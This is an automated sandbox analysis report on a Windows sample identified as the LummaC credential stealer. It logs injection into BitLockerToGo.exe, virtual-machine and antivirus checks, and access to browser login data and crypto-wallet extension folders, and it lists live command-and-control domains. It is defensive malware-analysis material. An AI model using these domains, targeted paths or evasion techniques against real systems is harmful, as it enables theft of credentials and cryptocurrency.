              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004373003_2_00437300
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00427B083_2_00427B08
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432B103_2_00432B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F3303_2_0043F330
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00404BC03_2_00404BC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004073C03_2_004073C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F3C03_2_0043F3C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C3CC3_2_0041C3CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004393D03_2_004393D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00423BE03_2_00423BE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040EB803_2_0040EB80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042238D3_2_0042238D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F4503_2_0043F450
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00439C703_2_00439C70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042847D3_2_0042847D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00421C803_2_00421C80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041DC903_2_0041DC90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004274A53_2_004274A5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00427CB03_2_00427CB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004365543_2_00436554
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00432D703_2_00432D70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040ED753_2_0040ED75
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043150E3_2_0043150E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C5103_2_0043C510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D5303_2_0041D530
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414DC03_2_00414DC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00437DE03_2_00437DE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004065F03_2_004065F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042FDF93_2_0042FDF9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040AD903_2_0040AD90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405DA03_2_00405DA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00436DB23_2_00436DB2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041FE7C3_2_0041FE7C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043FE203_2_0043FE20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402ED03_2_00402ED0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040C6F03_2_0040C6F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041DE903_2_0041DE90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004187403_2_00418740
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00428F6C3_2_00428F6C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004147773_2_00414777
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004237D03_2_004237D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00417FE13_2_00417FE1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041EFE03_2_0041EFE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00416F8D3_2_00416F8D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042F7BC3_2_0042F7BC
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: String function: 00AE5C20 appears 432 times
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: String function: 00AE3900 appears 283 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00407EE0 appears 45 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00414110 appears 82 times
              Source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 64pOGv7k4N.exe
              Source: 64pOGv7k4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00438860
              Source: 64pOGv7k4N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.1674985802.000000000570A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1696447642.00000000056F9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1675235024.00000000056EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 64pOGv7k4N.exeReversingLabs: Detection: 73%
              Source: 64pOGv7k4N.exeVirustotal: Detection: 72%
              Source: unknownProcess created: C:\Users\user\Desktop\64pOGv7k4N.exe "C:\Users\user\Desktop\64pOGv7k4N.exe"
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 64pOGv7k4N.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 64pOGv7k4N.exeStatic file information: File size 3805184 > 1048576
              Source: 64pOGv7k4N.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1b4a00
              Source: 64pOGv7k4N.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1ba600
              Source: 64pOGv7k4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: 64pOGv7k4N.exeStatic PE information: real checksum: 0x3a7505 should be: 0x3a10e6
              Source: 64pOGv7k4N.exeStatic PE information: section name: .symtab
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ACD051 pushfd ; ret 0_2_00ACD052
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 0_2_00ABB208 push esp; retf 0_2_00ABB236
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h3_2_0043F005
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00445408 push ebp; ret 3_2_00445409
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0044866F pushfd ; retf 3_2_00448677
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7936Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7992Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 64pOGv7k4N.exe, 00000000.00000002.1645393031.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
              Source: BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1766484120.000000000328F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1765907004.000000000328C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1766109037.000000000328E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043D910 LdrInitializeThunk,3_2_0043D910

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: 64pOGv7k4N.exe, 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mooncobudy.click
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E3D008Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000Jump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00438040 cpuid 3_2_00438040
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.1741119606.0000000003329000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7912, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exe, 00000003.00000003.1695541502.00000000056DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn
              Source: BitLockerToGo.exe, 00000003.00000003.1766109037.00000000032D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000003.1765784734.000000000331F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: BitLockerToGo.exe, 00000003.00000002.1766484120.00000000032BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.1725803632.0000000003319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
